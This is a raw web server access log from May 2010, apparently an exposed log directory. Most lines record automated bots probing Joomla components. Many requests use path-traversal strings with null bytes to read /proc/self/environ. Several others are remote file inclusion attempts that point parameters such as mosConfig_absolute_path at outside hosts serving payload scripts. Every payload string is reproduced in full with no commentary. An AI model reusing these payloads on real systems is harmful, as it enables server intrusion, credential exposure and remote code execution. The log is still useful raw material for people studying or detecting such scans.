93.174.120.20 - - [30/May/2010:08:05:37 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
93.174.120.20 - - [30/May/2010:08:05:38 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
93.174.120.20 - - [30/May/2010:08:05:38 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
114.108.177.125 - - [30/May/2010:08:06:29 -0500] "GET /index.php?option=com_sbsfile&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:08:06:29 -0500] "GET /logs/index.php?option=com_sbsfile&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:08:06:30 -0500] "GET /logs/access_log.1272412800/index.php?option=com_sbsfile&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
93.174.120.20 - - [30/May/2010:08:07:25 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
93.174.120.20 - - [30/May/2010:08:07:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
93.174.120.20 - - [30/May/2010:08:07:26 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
208.113.195.20 - - [30/May/2010:08:07:55 -0500] "GET /logs/access_log.1274313600//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
208.113.195.20 - - [30/May/2010:08:07:56 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
208.113.195.20 - - [30/May/2010:08:07:56 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
93.174.120.20 - - [30/May/2010:08:10:40 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
93.174.120.20 - - [30/May/2010:08:10:40 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
93.174.120.20 - - [30/May/2010:08:10:40 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
93.174.120.20 - - [30/May/2010:08:10:40 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
93.174.120.20 - - [30/May/2010:08:10:56 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.195.112.180 - - [30/May/2010:08:12:00 -0500] "GET /logs/access_log.1186444800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.121.217.207 - - [30/May/2010:08:13:10 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.esl-box.com/box12/ID1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.121.217.207 - - [30/May/2010:08:13:10 -0500] "GET /logs/access_log.1270771200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.esl-box.com/box12/ID1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.217.207 - - [30/May/2010:08:13:10 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.esl-box.com/box12/ID1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.38.52.84 - - [30/May/2010:08:14:09 -0500] "GET /logs/access_log.1274313600/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.38.52.84 - - [30/May/2010:08:14:09 -0500] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.52.84 - - [30/May/2010:08:14:10 -0500] "GET /logs/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.38.52.84 - - [30/May/2010:08:14:18 -0500] "GET /logs/access_log.1274227200/index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
200.43.180.250 - - [30/May/2010:08:15:58 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:08:15:58 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:08:15:58 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
69.94.137.93 - - [30/May/2010:08:17:17 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.94.137.93 - - [30/May/2010:08:17:17 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [30/May/2010:08:17:17 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [30/May/2010:08:17:23 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.94.137.93 - - [30/May/2010:08:17:24 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [30/May/2010:08:17:24 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.190.166.35 - - [30/May/2010:08:18:59 -0500] "GET /logs//index.php?option=com_rssfactory&task=section&id=1&Itemid=1&mosConfig_absolute_path=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
195.190.166.35 - - [30/May/2010:08:18:59 -0500] "GET //index.php?option=com_rssfactory&task=section&id=1&Itemid=1&mosConfig_absolute_path=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
218.149.84.14 - - [30/May/2010:08:19:28 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:08:19:39 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:08:19:39 -0500] "GET /logs/access_log.1271548800//components/com_simpleboard/image_upload.php?sbp=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:08:19:39 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:08:19:41 -0500] "GET /logs/access_log.1271548800//components/com_simpleboard/image_upload.php?sbp=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:08:19:41 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
67.195.112.180 - - [30/May/2010:08:21:12 -0500] "GET /?S=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.94.137.93 - - [30/May/2010:08:21:13 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.94.137.93 - - [30/May/2010:08:21:13 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.124.198.60 - - [30/May/2010:08:21:34 -0500] "GET /logs/access_log.1271116800//adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:21:34 -0500] "GET /logs//adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:21:34 -0500] "GET //adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:21:34 -0500] "GET //adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:21:34 -0500] "GET /logs/access_log.1271116800//adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:21:34 -0500] "GET /logs//adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:21:43 -0500] "GET /logs/access_log.1272067200//adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:21:43 -0500] "GET /logs/access_log.1272067200//adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:08:23:04 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
114.108.177.125 - - [30/May/2010:08:23:04 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
114.108.177.125 - - [30/May/2010:08:23:05 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.55.43.66 - - [30/May/2010:08:23:34 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
95.211.18.156 - - [30/May/2010:08:23:37 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [30/May/2010:08:24:39 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.124.198.60 - - [30/May/2010:08:24:58 -0500] "GET /logs//adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:24:58 -0500] "GET //adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:24:58 -0500] "GET /logs/access_log.1271116800//adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:24:58 -0500] "GET /logs/access_log.1272067200//adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:25:00 -0500] "GET //adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:25:00 -0500] "GET /logs//adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:25:00 -0500] "GET /logs/access_log.1271116800//adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:25:00 -0500] "GET /logs/access_log.1272067200//adminhead.php?path[docroot]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.146.255.196 - - [30/May/2010:08:27:54 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.195.112.180 - - [30/May/2010:08:28:47 -0500] "GET /logs/access_log.1242777600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.211.18.156 - - [30/May/2010:08:30:40 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
95.211.18.156 - - [30/May/2010:08:30:40 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.198.96.3 - - [30/May/2010:08:30:43 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:08:30:43 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
95.211.18.156 - - [30/May/2010:08:32:24 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.198.96.3 - - [30/May/2010:08:32:51 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
74.55.43.66 - - [30/May/2010:08:32:52 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
209.216.201.8 - - [30/May/2010:08:33:28 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
67.18.167.170 - - [30/May/2010:08:33:33 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
218.146.255.196 - - [30/May/2010:08:35:23 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
222.122.52.80 - - [30/May/2010:08:36:18 -0500] "GET /index.php?incl=http://irc6.interfree.it/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
222.122.52.80 - - [30/May/2010:08:36:18 -0500] "GET /logs/index.php?incl=http://irc6.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
174.142.68.135 - - [30/May/2010:08:37:08 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.142.68.135 - - [30/May/2010:08:37:08 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [30/May/2010:08:38:08 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [30/May/2010:08:38:08 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [30/May/2010:08:38:08 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
95.211.18.156 - - [30/May/2010:08:38:45 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
95.211.18.156 - - [30/May/2010:08:38:45 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
95.211.18.156 - - [30/May/2010:08:38:46 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.147.241.196 - - [30/May/2010:08:39:10 -0500] "GET /logs/com_ninjarsssyndicator../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 373 "-""libwww-perl/5.823"
69.147.241.196 - - [30/May/2010:08:39:10 -0500] "GET /com_ninjarsssyndicator../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 368 "-""libwww-perl/5.823"
174.142.68.135 - - [30/May/2010:08:39:10 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.195.236 - - [30/May/2010:08:39:27 -0500] "GET /logs/access_log.1243814400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.94.106.71 - - [30/May/2010:08:39:39 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
121.88.4.141 - - [30/May/2010:08:40:07 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
121.88.4.141 - - [30/May/2010:08:40:08 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
174.142.68.135 - - [30/May/2010:08:41:35 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.94.106.71 - - [30/May/2010:08:41:47 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.68.135 - - [30/May/2010:08:41:50 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.94.106.71 - - [30/May/2010:08:42:18 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
95.211.18.156 - - [30/May/2010:08:42:19 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
95.211.18.156 - - [30/May/2010:08:42:20 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
95.211.18.156 - - [30/May/2010:08:42:20 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.199.218.22 - - [30/May/2010:08:42:26 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ivpbrasil.org/id1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
217.199.218.22 - - [30/May/2010:08:42:30 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ivpbrasil.org/id1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
217.199.218.22 - - [30/May/2010:08:42:30 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ivpbrasil.org/id1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
217.199.218.22 - - [30/May/2010:08:42:30 -0500] "GET /logs/access_log.1271548800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ivpbrasil.org/id1.txt???? HTTP/1.1" 404 378 "-""Mozilla/5.0"
217.199.218.22 - - [30/May/2010:08:42:36 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ivpbrasil.org/id1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
217.199.218.22 - - [30/May/2010:08:42:37 -0500] "GET /logs/access_log.1271548800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ivpbrasil.org/id1.txt???? HTTP/1.1" 404 378 "-""Mozilla/5.0"
94.198.96.3 - - [30/May/2010:08:43:04 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:08:43:05 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:08:43:05 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
74.55.43.66 - - [30/May/2010:08:43:35 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [30/May/2010:08:43:35 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [30/May/2010:08:43:35 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
209.216.201.8 - - [30/May/2010:08:43:44 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:08:43:44 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:08:43:44 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:08:44:26 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:08:44:27 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
